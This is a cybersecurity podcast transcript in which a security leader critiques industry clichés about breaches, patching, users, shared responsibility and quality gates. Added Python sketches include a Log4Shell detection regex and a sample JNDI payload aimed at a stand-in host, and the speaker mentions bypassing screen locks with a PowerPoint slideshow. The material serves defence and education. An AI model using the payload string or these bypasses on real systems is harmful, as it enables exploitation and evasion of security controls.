Cybersecurity has a marketing problem — and we're going to fix it

On today's episode, we're breaking down phrases you've heard a million times: “security is everyone’s job,” “humans are the weakest link in the security chain,” “it’s not if you get breached, but when.” Returning guest Alyssa Miller drills into these comforting nostrums and explains why, even when they’re used for well-intended purposes, they often act to limit the conversation and the options, rather than address the hard work needed to overcome these evergreen problems. You’re not going to want to miss this one, folks! It’s all that, plus a little bit of book talk, today on Cyber Work!

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

  • 0:00 - Intro
  • 1:38 - Alyssa's tweet that inspired this episode
  • 4:00 - Why you need to read the Cybersecurity Career Guide
  • 9:10 - Cybersecurity platitudes and clichés
  • 11:30 - Cliché 1: "It's not if you get breached, but when"
  • 18:44 - Cliché 2: "Just patch your shit"
  • 24:58 - Cliché 3: "Users are the weakest link"
  • 32:34 - Cliché 4: "Security is everyone's job"
  • 35:52 - Cliché 5: What is a "quality gate"?
  • 44:14 - Cliché 6: "You just need passion to get hired"
  • 48:14 - How to write a better cybersecurity job description
  • 50:15 - Business value of diversity and inclusion
  • 52:52 - Building a security champions program
  • 55:12 - Where can you connect with Alyssa Miller?
  • 56:44 - Outro

[00:00:00] CS: Cyber Work listeners, I have important news before we dive into today's episode. I want to make sure you all know that we have a lot more than weekly interviews about cybersecurity careers to offer you. You can actually learn cybersecurity for free on our InfoSec skills platform. If you go to infosecinstitute.com/free and create an account, you can start learning right now.

We have 10 free cybersecurity foundation courses from podcast guest, Keatron Evans. Six cybersecurity leadership courses from also podcast guest, Cicero Chimbanda. 11 courses on digital forensics, 11 courses on incident response, seven courses on security architecture, plus courses on DevSecOps, Python for cybersecurity, JavaScript security, ICS and SCADA security fundamentals and more. Just go to infosecinstitute.com/free and start learning today. Got it? Then let's begin today's episode.

[INTRODUCTION]

[00:00:57] CS: Today on Cyber Work, it's the phrases we've all heard a million times. Security is everyone's job. The human is the weakest link in the security chain. It's not if you get breached, but when. Returning guest, Alyssa Miller drills into these comforting nostrums and explains why even when they're used for well-intentioned purposes, they often act to limit the conversation and the options, rather than address the hard work needed to overcome these evergreen problems. You're not going to want to miss this one, folks. It's all that, plus a little bit of book talk today on Cyber Work.

[INTERVIEW]

[00:01:39] CS: Welcome to this week's episode of the Cyber Work with InfoSec Podcast. Each week, we talk with a different industry thought leader about cybersecurity trends and the way those trends affect the work of InfoSec professionals, while offering tips for breaking in or moving up the ladder in the cybersecurity industry. My returning guest, Alyssa Miller, is a lifelong hacker, security advocate and executive leader. She is the Business Information Security Officer, or BISO, for S&P Global Ratings and has over 15 years’ experience in security and leadership roles.

She is heavily involved in the cybersecurity community as an internationally recognized speaker, author, content creator and researcher. Alyssa serves on the board of Epiphany Solutions Group, Blue Team Con and Circle City Con. She is a strong proponent for making the path into security careers easier and improving equity and diversity within the cybersecurity community.

Today's episode sprang from a tweet that Alyssa tweeted on May 14th, 2022. I'm going to read the tweet in full, because I just love it. Alyssa said, “Phrases that make me want to tear the vocal cords out of #InfoSec people. One, it's not if you get breached, but when. Two, just patch your shit. Three, users are the weakest link. Four, security is everyone's job. Five, quality gate. Every one is just a lazy abdication of our accountability.”

If you didn't get a shiver of recognition on hearing at least one of those phrases, are you even really in the cybersecurity field? While some of these phrases might be well-intentioned, as Alyssa said, they are ultimately balms meant to soothe self-inflicted injuries. If we actually want to progress boldly and tackle the very real and systemic problems in the industry head on, it's worthwhile to interrogate these commonly heard phrases, see if we can come up with some better reframings of the problems, and work towards real, more difficult, but lasting solutions.

The major through line of this episode will be interrogating these phrases and coming up with viable solutions. I mean, we're not going to solve them today, but we're going to try. Alyssa, thanks for joining me today. Welcome back to Cyber Work. It's great to see you.

[00:03:39] AM: Thanks, Chris. I appreciate it. It's great to be back.

[00:03:42] CS: All right. To start with, I always recommend that listeners check out past episodes by our returning guests. In hers, Alyssa tells us all about her security journey, her years of study and training, and lots more. Since it's been roughly a year, what are some projects you'd like to talk about that you've been working on? I know you have a book coming out soon.

[00:04:01] AM: Yes. We've been working on the book forever, it feels like. Actually, by the time this episode airs, it should probably be available. I will have copies with me at RSA Conference. Depending on when this airs, it may have already happened, or maybe –

[00:04:17] CS: Yeah. It might be in the past.

[00:04:19] AM: We'll see. I should actually have physical copies by then; binding, shipping, it's been a long road. Yeah, Cybersecurity Career Guide, with Manning Publications. I am thrilled to finally be getting this out there. All the feedback I've gotten from people who've looked at advance copies of it, who bought the early access preview of it, the feedback has been phenomenal. I've already had a couple of people, quite honestly, and this is – yes, I'm bragging right now, but I don't care. I'm proud of this thing.

[00:04:51] CS: Brag away. This is a big deal.

[00:04:53] AM: At least two people have reached out to me already to say that the book actually helped them land a job, which, to me, right there, is everything. I mean, the fact that I touched two people's lives, that's all I needed to know. Every ounce of effort I put into this, all the frustrations and anxieties, that's what the book is all about. I'm hopeful that it's going to connect with more people. I'm talking with some folks at different universities about how we can get the book available to their students and so forth, just because I think it brings that value in helping people navigate what right now is a really rocky road to try to start a career in cybersecurity.

[00:05:35] CS: Oh, yeah. I mean, the title Cybersecurity Career Guide, again, speaks for itself. Can you break down what's going on in the book chapter by chapter?

[00:05:43] AM: Yeah. I'll go by section. There's three main sections to the book. The first section is really just talking about the industry itself and what actually is cybersecurity? What are the jobs and what's involved? What is the story with this talent gap that we hear so much about? Addressing a lot of that. A lot of the research that I did over the last couple of years goes into that.

The second section is really about knowing and preparing yourself for that job search. There are tangible exercises to figure out what area of cybersecurity you should be looking at, the one most likely to be a fit based on your interests. Because that's a question I get a lot. People are like, “Can you help me get into cybersecurity?” I'm like, “Okay. Well, what do you want to do?” “I want to do it all.” “Well, you can't do it all. Nobody can do it all. What are you talking about?” There are people who've been in this industry and retired from this industry. You can't do it all.

[00:06:43] CS: Yeah. It's like saying, I want to get into music. Could you narrow it down a little bit?

[00:06:48] AM: Right, and no one expects people to know up front, “This is the route I'm taking, and it's going to be the right path,” or anything else. Yeah, there are some exercises in there just to explore that. Then inventory your skills, and talk about how to really navigate job descriptions, because they're notoriously awful. It's about equipping people with a lot of tools.

Then the last section, the last three chapters, is really focused on, all right, you won the job, now how do you establish longevity? How do you position yourself? I do delve into things like impostor syndrome and tools for how to deal with that, how to approach negotiating a job offer, how to keep moving along in your career planning, having some goals and that sort of thing.

It's really comprehensive. I think it's probably valuable even for some people who are already working in the industry. Definitely for those trying to either pivot in from another industry, or coming out of school, or something like that, who want that first job. It's definitely, I think, something that's going to prove valuable for a lot of people.

[00:08:00] CS: I love everything about that. So many of the things that it's addressing and the fears that it's quelling are things that pop up in the comment sections of these videos all the time. People need to really go find that book. Go find Cybersecurity Career Guide by Alyssa Miller. These are the things people are asking: How do I get experience without experience? How do I know what part of cybersecurity I'm going to be good at? What if I don't like what I'm doing? How do I pivot? Those were all intangible things in the past that now, hopefully with your book, have very tangible answers.

[00:08:40] AM: Awesome. Yeah. I mean, I know it's going to help people, because like I said, I've already got confirmation. Yeah. I mean, if anyone's looking for it, by the way, the easiest way to get there is alyssa.link/book. Really, that simple. I got a URL redirector out there that makes it really easy, because otherwise, searching for it on Amazon, or on Manning site, or anything else, nah, make it easy for that.

[00:09:05] CS: Alyssa.link/book. Is that right?

[00:09:09] AM: Yup.

[00:09:09] CS: All right. Okay, so yeah, we're going to mostly structure this episode around all the points in your tweet that we were talking about before. I want to ask first, was there a specific moment, or a breaking point that brought you to vocalizing this in this way? Or was it something that's just been roiling in your head for a long time?

[00:09:28] AM: It's just been stewing. I mean, it's a lot of different things. I think, I did actually hear someone say one of them in a really just inappropriate environment. It was just like, that was kind of the thing. Yeah. I mean, all of them are things that we hear a lot. They're different platitudes and cliches that we throw out pretty recklessly in my opinion. We don't really consider the weight of the ramifications of the things we're saying and who's hearing it and how that impacts stuff. Like I said in the tweet, a lot of them are just like, it's a lazy abdication of our responsibility and things. Like, when we say, users are the weakest link, or whatever, it's counterproductive.

[00:10:18] CS: Yeah. There are statements that are meant to open up a conversation, and then there are statements that are meant to end the conversation. A lot of these feel like, I don't want to get into this. The user is the weakest link; what are you going to do? It just narrows the options that we have. I was so excited about the idea of interrogating these and seeing what the harder version of each one is, instead of stopping at that same point. Yes, users are a certain pain point in the network or whatever, but how do we do something about that, instead of just writing it off?

[00:10:59] AM: I mean, take what you just said, that a lot of them do come off as conciliatory, we're giving up. Well, if there's nothing we can do about it, then why do we exist? There is no point in having an information security team in your company if that information security team can't fix, or address these problems, right? I mean, why are we there? That goes right to every one of them, but the first one in particular.

[00:11:28] CS: Right. Let's start there: it's not if you get breached, but when. This seems to be shorthand for saying that security breaches can happen even when the most advanced security measures are in place, and that you can't rely solely on your security posture to keep the criminals out of the gates. But there's a flip side to that coin where, as you put it, it becomes an abdication of responsibility on the part of the cybersecurity team on duty and the industry as a whole. Can you talk a little bit about this? What would be a better way to think about and reframe this idea?

[00:11:56] AM: Right. Let's take that apart. On the surface, it's 100% accurate. We all know that. We understand that. Imagine going into, say, an executive leadership meeting, or a board meeting where you're about to pitch an idea. You're asking for funding for something. You start off with that statement (this is a true story, by the way): it's not if we get breached, but when. Well, then why are you surprised when they're not going to spend money on your initiative? Hey, it's not if, but when. I can't do anything to stop it, but here, spend all this money on these tools that are going to help me stop it.

[00:12:37] CS: Or any of that.

[00:12:39] AM: Now that's an extreme example. It’s a true story, but extreme. Even just by saying that, putting it out in the media, I mean, that exact quote was Robert Mueller, the former FBI director, who said that in a public space. Now you have all these executives who are listening to that and saying, “Oh. Well, there's nothing we can do about getting breached. Well, then maybe I just focus my money on cyber insurance. Because if I can't stop getting breached, I need to make sure that the financial impacts of a breach are covered.” Then we wonder why we have trouble getting people to think beyond cyber insurance.

This is one of those things where yes, the statement is accurate. But stop saying it, because who's hearing it is being impacted in a very different way, and it's actually very counterintuitive and counterproductive to what we're trying to do. Instead, what I tell people is flip the script completely. Okay. The problem with that statement, it's not if, but when, is that it encourages focusing on the wrong thing. It's saying, well, we have to be perfect in our cybersecurity efforts. Well, no. Turn the story to, we're focused on resiliency. We can say, it's not if, but when an attacker might breach our walls. We want to focus on being resilient to that, so that we limit the damage. I mean, I hear limit the blast radius, but I really hate the military analogies and metaphors we use.

That's the thing. Change the conversation. Change the narrative completely. We're focused on resiliency. How do we detect and respond to attacks? Don't say react. Respond. We're not reacting. We shouldn't be reacting. Unfortunately, we do a lot. Responding to attacks. We know that things will happen. We put tools in place to detect them. We put tools in place to limit them and we put tools in place to specifically react, or respond to that after we've had the opportunity to analyze what's going on and do our thing.

The way I've talked about it previously is you got three types of defenses. I hate the military analogies, but here we go with one. Think about a castle, where they have walls and courtyards and then more walls and then courtyards and then they’ve got the keep, where all the important stuff is. Well, there's three types of defenses there. You've got the detection defenses, which are your lookouts, you've got mitigation defenses, which are aimed at just slowing down the attack, which is that space between those walls. Then you have the active defenses, which are your knights and archers and all the other stuff. We have all the weapons. Do the same thing with cybersecurity.
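Alyssa's castle analogy maps cleanly onto a layered event pipeline. A minimal sketch of that idea follows; every function and field name here is a hypothetical illustration of the three defense types she names (detection, mitigation, active response), not any real product's API:

```python
# Toy sketch of the three castle-style defense layers described above:
# detection (the lookouts), mitigation (slow the attacker down between
# the walls), and active response (the knights and archers).
# All names and thresholds are made up purely for illustration.

def detect(event):
    """Detection layer: lookouts such as IDS alerts or log monitoring."""
    return event.get("failed_logins", 0) > 5 or event.get("source") == "unknown_host"

def mitigate(event):
    """Mitigation layer: slow the attack (rate limiting, segmentation)."""
    return dict(event, rate_limited=True, segment="quarantine_vlan")

def respond(event):
    """Active response layer: analyze, then deliberately respond (not react)."""
    return f"ticket opened: isolate {event.get('source', 'unknown')}"

def handle(event):
    # An event flows through all three layers rather than relying on
    # a single perimeter wall to keep everything out.
    if not detect(event):
        return None  # nothing suspicious observed
    contained = mitigate(event)
    return respond(contained)

print(handle({"source": "unknown_host", "failed_logins": 9}))
# prints "ticket opened: isolate unknown_host"
```

The point of the structure, as in the castle, is that no single layer has to be perfect: a miss at the wall still leaves the lookouts, the courtyard, and the responders.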

[00:15:42] CS: Yeah. Yeah, yeah. That makes a whole lot of sense. It is one of those sorts of subtle things. It reminds me of when people say, when we talk about fighting for civil rights, or whatever. The shutdown version of that is, oh, it's all just rigged. It's all just rigged. Everyone's against us. Because it shuts it down in a very specific way that says, there's nothing we can do about this. Why even try? Especially, like you said, when you have a C-suite person hearing that, they're like, “Great. I can put that money elsewhere, instead of, yeah.”

It also speaks to the lack of understanding that higher-level people might have about what the security department actually does. It's not just the walls and the archers. It's the crafting of this multi-part security process. You can say, it's not if, but when, and when it happens, we need to be ready with certain strategies and stuff like that, right?

[00:16:42] AM: Yup. Exactly. It's not about preventing the breaches altogether. It's about limiting the risk of them and being able to respond when they do happen.

[00:16:54] CS: Yeah. That was one of the first mind-blowing things when I talked to an incident responder, hearing the idea that getting hacked, getting breached, someone being in there for a long time isn't even necessarily the thing. That's not the end game. It's not, my life is ruined, everything's done. It's like, all right, take a breath. What do we do next? I think people think of security in those terms. Did we get breached this week? No. Okay, then security's working. Did we get breached this week? Yes. Our security plan is complete garbage, or something like that.

[00:17:24] AM: Oh, and there's another one that's not on that list that encourages that: don't let a good crisis go to waste.

[00:17:31] CS: What does that mean exactly? Or how is that used essentially?

[00:17:33] AM: Well, the point of it is when you have a crisis, when you have a breach, everybody's wallets are open, so go get as much money as you can. Which just reinforces the idea that something was broken in our security infrastructure, and that's why we got breached. Instead of focusing on hey, you know what? We had this incident and we responded to it in these ways. We had these tools in place. As a result, we limited the impact to this. Now, we learned a couple things we want to invest a little bit more. By the way, if you showed them the positive impacts of your past investments, they’re more willing to give you money for new stuff. Yeah, that works.

[00:18:13] CS: Yeah. If you just ask for money without any indication, it's like, you fell and skinned your knee and you asked for an ice cream cone or something like that. They'd be like, “How many times are we going to do this?”

[00:18:24] AM: Everything that you spend money on now so far failed miserably, and we got breached, so give me more money to go spend.

[00:18:31] CS: I guarantee, it might happen again.

[00:18:34] AM: Yeah. Right. Wonder why CISOs get scapegoated after a breach. Because we don't know how to talk about it.

[00:18:43] CS: All right. Yeah. To move on to that, the second stock phrase in your list is “just patch your shit.” I like that phrasing. This is less about the inside-versus-outside, defender-versus-attacker dichotomy of the last question and more about vulnerabilities, with the assumption that if you're keeping up with updates and patches, you're doing the big work. Conversely, if something goes wrong, it's just because you didn't patch. We've had a lot of guests come on and talk about things like how vulnerable doesn't necessarily mean exploitable, and the importance of vulnerability management and focusing your work on the parts of the network that could actually be compromised. Is this what you're talking about here?

[00:19:16] AM: I mean, that's part of it. It's multifaceted. That's one part, right? It's like, well, if we just patched all our stuff, we'd be safe. No. Log4J. Thank you. Good night. That story's done. At the same time, what really frustrates me is how it treats the people who are responsible for patching. Our operations teams, our SREs, the people who are down there every day doing the patching, it treats them like they're just being lazy, or not doing their job well, because not everything is patched to the latest version, which is a complete load of trash.

I'll be blunt. Some security people have that attitude, pretending it's just easy to go get the next patch and apply it. Yeah, tell that to your SREs when they do that, and then the database blows up, or some data access layer is incompatible with that new version. Now you spend hours resolving an outage. The whole idea from security that we can just ignore the reliability of these things, the stability of the environment, in favor of security is so disconnected from the world of business that it really puts us in an awful place.

I mean, this is where we get nicknames like the Department of No, the things that people say about us, because we don't consider that big picture. Instead, we get so focused on, well, if you had just patched your shit, we wouldn't have been breached. Okay, if you had just put some mitigating controls in place, or whatever, we wouldn't have been breached either, so shut up. I mean, that's how I feel about it.

[00:21:09] CS: Can you expand on the mitigating control aspect of this? I don't understand these things, so please –

[00:21:17] AM: Take Log4J as a perfect example. Here's something that wasn't even patchable at first. I mean, this was a zero-day vulnerability. It's in 90% of Java apps. Everybody's got this problem, right? Anybody who's dealing with Java apps has this problem. The fix is a package upgrade, and by the way, those updates aren't necessarily backward-compatible. You didn't have an update initially, so what do you do instead? If you get breached by Log4J because you had it in your Java app before they had a fix out for it, how can you say to someone, go patch your shit?

Did you have WAFs in place? Had you put in the necessary controls for outbound internet traffic? Because that second one, the outbound internet traffic, if you weren't allowing that from your servers, immediately shut down the entire attack. I mean, the entire RCE with Log4J. If you weren't allowing that outbound traffic, it couldn't go out and make the additional calls it needed to make in order for the exploit to happen. You're done. I mean, you were safe.

Then you could go patch your stuff when the patches came out. If you had a WAF in place, a web application firewall, yeah, was it perfect? No. But you could limit things very quickly; a lot of those vendors had signatures available to block a lot of the attack strings. Again, did you have that available? Was that in place? There was a lot that security had to do there that is best practice, stuff that we talk about. If you didn't have it there, well, hey, we're as culpable as anyone else. In fact, more so, because there was, again, no patch to be applied.
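The two mitigating controls Alyssa describes, egress filtering and WAF-style request inspection, can be sketched roughly as follows. This is a deliberately simplified illustration: real Log4Shell payloads used many obfuscated variants (nested `${lower:...}` lookups and so on), so a single signature like this would not have caught everything, and the allow-listed hostnames are made up:

```python
import re

# Simplified sketch of the two Log4Shell mitigations discussed above.
# Real attack strings were heavily obfuscated, so treat this signature
# as an illustration of the idea, not a usable WAF rule.
JNDI_SIGNATURE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

# Hypothetical egress allow-list: servers may only reach these hosts.
EGRESS_ALLOWLIST = {"artifact-repo.internal", "api.payments.internal"}

def waf_blocks(request_text):
    """WAF-style inspection: flag requests carrying a JNDI lookup string."""
    return bool(JNDI_SIGNATURE.search(request_text))

def egress_allowed(destination_host):
    """Egress filtering: the RCE dies if the server can't call out to the
    attacker's LDAP/RMI host to fetch the second-stage payload."""
    return destination_host in EGRESS_ALLOWLIST

print(waf_blocks("User-Agent: ${jndi:ldap://evil.example/a}"))  # True
print(egress_allowed("evil.example"))                           # False
```

The egress check illustrates her point exactly: even with the vulnerable library still deployed and no patch available, the exploit chain breaks because the outbound callback is denied.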

[00:23:09] CS: Yes. That's my question, and you answered it there, that it is a best practice. I don't understand this stuff as well as you do, obviously. What you just said there as the solution, the mitigating controls, would that be something that most security departments would have known about and just didn't do, because of XYZ reason?

[00:23:33] AM: Oh, for sure. Absolutely. I know there's people out there right now are saying, “Well, I can't get money for a WAF, or my business won't let me install it. Or we can't do network segmentation, or we can't control egress, because the business, this, that, the other thing.” No, I don't accept those excuses. Here's why. Our job as security people is to communicate the needs for these controls in a way that resonates with the business and motivates them to action. That's on us.

Now, that's not to say that if you do that perfectly, you're going to get unlimited budget to do all the things you want to do. No. But we understand, or should understand from the cybersecurity side, how to prioritize the controls that we need. Where a lot of times we fall down is that we fail to communicate it that way. We try to come in with fear. We try to come in with stories of other breaches and all these other things. If you make this something where, hey, this is how I'm going to enable your business to make more money, this is how I'm going to enable you to innovate, or enter new markets, or something like that, connect your initiatives to that, you get a lot more support. But we're not real great at doing that in cybersecurity.

[00:24:50] CS: Yeah. Communication, communication, the great soft skill that we all ask for and don't always get. Now we come down to the phrase that most specifically raises my hackles, which is users are the weakest link. I find this annoying for two reasons. One is that, as past guests of the show have said time and time again, thinking of your employees and the users of your tech as weak links devalues them as professionals and people, and also makes it harder for them to think of themselves as active participants in the security process.

The flip side, which I think is less discussed, is the idea that absent the human factor with regards to things like social engineering, insider threat, or bad business practices, we'd all have these impenetrable fortresses and cybercrime would somehow shrivel away. I'm guessing we can't machine-learning our way into a perfectly sealed, hermetic universe. What's a better way to think about humans, not as some annoying anomaly that our perfect machines have to deal with, but as the actual beneficiaries of and reason for all this technology?

[00:25:49] AM: Yeah. There's a lot here, obviously, to unpack, too. First of all, the statement itself is one small step above users are stupid, right?

[00:25:58] CS: Yeah. Completely.

[00:26:00] AM: It's one step above the stupid user story, which is awful. To your first point, yeah, it's devaluing the people. Here's a question for you, though. Aren't your information security people also users in your environment?

[00:26:11] CS: Exactly. Yeah. They use the tech as well.

[00:26:17] AM: Right. How many of them have perfect track records on your phishing tests? Probably none. I won't go into my diatribe on phishing tests today, because that's a whole other ball of wax. I mean, again, the problem with it is it's very dismissive. It's, well, we got these users, they're always going to be the problem. That's the human element. There's nothing we can do. Yeah. Because we do a lot of things that don't address the user issue. Phishing tests are one of them.

I mean, I actually have a different tweet thread out there, I guess I'm getting into the phishing thing now, about how easy it is to set up rules in Outlook to identify and self-quarantine anything that's a phishing test. That's a perfect example of where you're actually encouraging the wrong behavior with your security awareness control. When we say users are the weakest link, we imply this immediate division between our user base and the security team, which is, again, exactly the opposite of what we want. You want that to be the most collaborative, very interactive relationship. They're learning from us and, here's the kicker, we're learning from them.

How are you using the tools we put in your hands? How you're using those tools impacts the things that we can do to secure them and to make it easier for you to keep yourself secure. What are we doing to make it easier? All right, can we block all links that are in email? Sure, we could probably set up some filter somewhere to strip out all the links. Is that reality, though? How's that going to work? Okay, so how do we do this differently?

Let's start with looking at the emails that our own systems send. Do they look like phishing? A lot of times, they do. Those kinds of things in the environment. All right, how can we take your ServiceNow notifications, for instance, and change those so that it's clear they're not phishing attempts, so that we're not encouraging the wrong behavior? Otherwise, you're just encouraging people to do the exact things you're trying to tell them not to do. Hey, here's this link, you've got to click this link to go to your ServiceNow tickets; it's the only way you're going to get there. Or here, click this link, and it'll send an email to approve this ticket.

Well, okay. Yeah, maybe we don't give you anything other than a ticket ID anymore, but how do we do that better? You see random SurveyMonkey emails come in from HR teams, because they're doing some employee engagement survey or something. Could we do a little better, please? That's where we really need that collaboration, because we should be working with those teams to say, let's talk about how we can do this in a way that's not going to encourage silly behaviors that we don't want to see, including from within our own ranks.
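The Outlook-rule trick Alyssa mentions works because phishing-simulation platforms typically stamp identifying headers on their test mail, so a one-line mail rule can quarantine every test while doing nothing about real attacks. A rough sketch of that failure mode follows; the header names are hypothetical stand-ins, not any real vendor's:

```python
# Sketch of why header-based phishing simulations are easy to game.
# Simulation platforms often add identifying mail headers to test
# messages; the header names below are made up for illustration.
TELLTALE_HEADERS = {"x-phish-simulation", "x-training-campaign-id"}

def is_simulated_phish(headers):
    """The same one-line check a user's Outlook rule effectively performs."""
    return any(h.lower() in TELLTALE_HEADERS for h in headers)

inbox = [
    {"Subject": "Urgent: reset your password", "X-Phish-Simulation": "true"},
    {"Subject": "Urgent: reset your password"},  # real attackers send no tell
]

# The rule quarantines every simulated test and passes the real phish
# straight through, so the metric improves while risk does not.
quarantined = [msg for msg in inbox if is_simulated_phish(msg)]
print(len(quarantined))  # 1
```

This is the "encouraging the wrong behavior" point in miniature: the control measures whether users can spot the simulator's fingerprint, not whether they can spot a phish.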

[00:29:33] CS: Can you give me a concrete example in terms of things that you could learn from the users about the way they use the system, things that you've seen, like you said, learning is a two-way street. What are some things that you've seen from users that they're doing that make you – whereas otherwise, you might just force them to stop doing that and you're like, “Oh, okay. Well, we can work with it”?

[00:29:54] AM: Well, I mean, it's understanding workflows. You may have applications within your environment, where part of their workflow is they get an email notification that says, “Hey, this task has been assigned to you. Click here to go view it.”

[00:30:06] CS: Got it.

[00:30:07] AM: Understand that, okay, if you say no, don't do that, they now have to go click a bookmark in their browser, log in, and do all of this. Understand that, yeah, that's more secure, but it's also something that's going to encourage them to bypass that control somehow, because that's going to be far more onerous than, “Hey, I just have to go here, click this link, it takes me right to my ticket. I don't have to do a search or anything else. It's just there.” That speeds up my workflow.

Because at the end of the day, so many of the breaches start with phishing. I mean, we're really narrowed in on phishing right now, but it's a great example of users and what users do. Most of the time that they fall victim to one of these attempts, it's because they're in a rush, or they're trying to get through processing the 450 new emails they got in the last day.

I mean, sometimes you're just not even thinking, or you're in a certain mindset because of something else you were doing, and that phishing email just happens to pop up at the right time.

Another example, and this is actually coming from a tweet, too, that same thread with the phishing one: hey, did you know you can bypass the automatic screen lock that your company forces on you just by running PowerPoint? You open up a PowerPoint presentation and put it into slideshow mode, and your PC will never lock. It works on Mac. It works on PC with Windows. Okay, so there again, why would a user do that? Well, they may have other tools with long-running processes that then fail or react in some poor way when the screen locks.

Now, again, we've encouraged a behavior we don't want, instead of working with them to understand, okay, what is it about this tool? How can we address that differently? Is there maybe a temporary way that they can turn off the screensaver just for that moment? Whatever, some way to handle that. There again, perfect case where we can work closer with the users.

[00:32:33] CS: I love that. Next, I mean, sure, “security is everyone's job.” I get that in a general sense. If you're leaving the house for the night, lock the door on your way out. This is one that definitely feels the most like the core of your thesis, that these are abdications of accountability in the cybersecurity industry. How do we move from security is everyone's job to, say, something like, many hands make light work, but most of the work still has to be ours?

[00:33:00] AM: That's one way to put it. That's the thing, right? See, my problem with that phrase, again, it's not wrong. That's the thing with most of these; they're not actually inaccurate, but they're just these platitudes, and the way they land is the problem. You look at this, like okay, security is everyone's job, but look at the actions that occur behind that. We say security is everyone's job. Therefore, let's shift left. Developers need to be responsible for application security. Developers need to be a part of it, but they're not alone in that. We're there with them.

Here's the bigger thing, and this is why it frustrates me. The DevSecOps message, or DevOps initially, is all around the idea of shared responsibility. You go back to 2008, when Andrew Shafer and Patrick Debois get together and come up with DevOps, and they didn't even call it that at first. DevOps: we're going to get our operations engineers and our developers all focused on a common set of responsibilities that they're all responsible for. Efficient pipelines, stable code, availability in production, and everything's got to be fast. Remove all the silos, remove all the red tape, let's unite.

Four years later, security starts to actually really pay attention to this. Over time, the message from security is, “Well, yeah, yeah, yeah. That's great. That's great. That's great. Shared responsibility.” Everybody shares responsibility for security. Okay. We missed the other half of that equation. If we're asking them to be responsible for security, we need to be as security people, responsible for the efficiency of that pipeline. We need to be responsible as we were talking earlier, for the availability and stability of that environment when these things hit production; the performance of that production environment.

We can't stand there and say, “Yes, I know this slows you down, but we need this security control.” Or, I'm going to put in this quality gate where you have to run a code scan every build. By the way, we farm that off to a third party, and it takes them two days to respond? No, you can't do that, because now you're breaking the pipeline. That's where it's like, yes, security is everybody's responsibility. If we're going to say that, then you know what? Pipeline efficiency is everybody's responsibility. Production availability and stability is everybody's responsibility, including ours. We can't walk away from that.

[00:35:53] CS: Now, of all the phrases that you mentioned in your tweet, and you mentioned just now, “quality gate” is the one I'm least familiar with. I did a bit of online sleuthing, and I feel I could fake along in a conversation. For our listeners, can you give me more about the concept of a quality gate and where the idea breaks down, or doesn't go far enough, or focuses on the wrong aspects of things?

[00:36:12] AM: It's actually what I was just describing. I forgot that this one was coming. It was a nice segue, actually. Hey, look at me. Like I’ve done this before or something. A quality gate is that idea that we set this gate in the pipeline. You think of the different phases of the pipeline. You've got design, then you're coding, then you're building, you're promoting, you're testing, you're deploying, and then you've got post-production support, loosely. I mean, people will structure those differently and call them different things, but you've got these different phases. The idea of a quality gate is that between those phases, we put something that says, we're going to ensure the quality by doing some other step. That step has to pass in order for that gate to open.

The common example from a security perspective is what I was just describing. When you run your build, part of that process, and we automate the crap out of this, because DevOps, everybody's focused on automation, and rightfully so. We automate a SAST scan, a code scan, and we say, well, if you have any highs or criticals, you have to go back and fix those before you can move on from the build process. Well, okay, now that scan runs. How long does the code scan take? Well, if you're sending it to certain providers out there, it takes days. Even if you've got a tool in-house that you're leveraging, it can take hours, depending on the code base, how much is getting scanned, how you have it configured, all that happy stuff.
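As a rough sketch of the blocking gate being described here — every name, severity label, and data shape below is hypothetical, not taken from any real CI system or scanner:

```python
# Hypothetical quality gate: the build may not proceed if the SAST
# scan reports any findings at a blocking severity.
BLOCKING_SEVERITIES = {"critical", "high"}

def quality_gate(findings):
    """Return True when no blocking-severity findings are present."""
    return not any(f["severity"] in BLOCKING_SEVERITIES for f in findings)

# Fabricated scan output, purely for illustration.
scan_results = [
    {"id": "SQLI-1", "severity": "critical"},
    {"id": "XSS-7", "severity": "medium"},
]
print(quality_gate(scan_results))  # False: the critical finding blocks the build
```

The catch, as the conversation goes on to explain, is not this check itself but the slow, sometimes inaccurate scan that has to finish before it can run.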

Now, that threatens to break the pipeline, because the pipeline should flow in one direction. It's a pipeline. Does the water in your house suddenly start flowing the other direction? That would be bad. That’s not how pipelines work. Same thing with things like gasoline pipelines, okay. Pipelines go one direction. Quality gates threaten to undo all of that and send everything all the way back.

Where it's especially problematic is when those feedback loops are long, like I said, or when they're inaccurate. We think about things like code scans, for instance; those things are fraught with false positives, or they find a vulnerability that is, to your point early in the show, vulnerable but not exploitable, because, oh, yeah, there's no way to actually get to that code. Now you have that situation where, okay, the engineer's got to look at it, they've got to figure out, is it actually vulnerable? How am I going to fix it? Everything else.

Whereas, if we focus on pipeline efficiency, focus on that idea of CI/CD, continuous integration, continuous deployment, we can get that pipeline sped up to the point that we're doing multiple deploys per day. This is the thing that scares the living shit out of security people. Deploy that stuff with the vulnerabilities in it. Deploy it. Don't stop them. Let them deploy it. If your pipeline is efficient enough that you can fix it in a day or less, or whatever the acceptable timeframe is for you from a risk perspective, think about that. You identify the vulnerabilities, still run that scan at build time, but don't stop them.

Any of those highs or criticals now go back into their backlog as P1, or P0, whatever you call your top priority. Whatever that designation is that says this goes in the very next development cycle no matter what. Put it in there like that. Let them fix it then. Now it comes through and the development pipeline still moves in one direction, because you've just created new backlog items. Now, if you've focused on making your security tools help the efficiency of that pipeline and you're getting really good at CI/CD, well, now you're going to fix it in a matter of hours or days anyway. How much risk is there from letting that vulnerability go through?
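The non-blocking alternative described here could be sketched as follows — again, the function, field names, and priority label are invented for illustration, not any particular tool's API:

```python
# Hypothetical non-blocking approach: run the scan at build time, let
# the deploy proceed, and file highs/criticals as top-priority backlog
# items for the very next development cycle.
def scan_and_file(findings, backlog):
    """File blocking-severity findings as P0 items; never stop the build."""
    for f in findings:
        if f["severity"] in {"critical", "high"}:
            backlog.append({"priority": "P0", "finding": f["id"]})
    return True  # the pipeline keeps flowing in one direction

backlog = []
deploy_ok = scan_and_file(
    [{"id": "SQLI-1", "severity": "critical"},
     {"id": "XSS-7", "severity": "medium"}],
    backlog,
)
print(deploy_ok, backlog)  # True [{'priority': 'P0', 'finding': 'SQLI-1'}]
```

The design choice is the point: the same scan still runs, but its output feeds the backlog rather than gating the pipeline.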

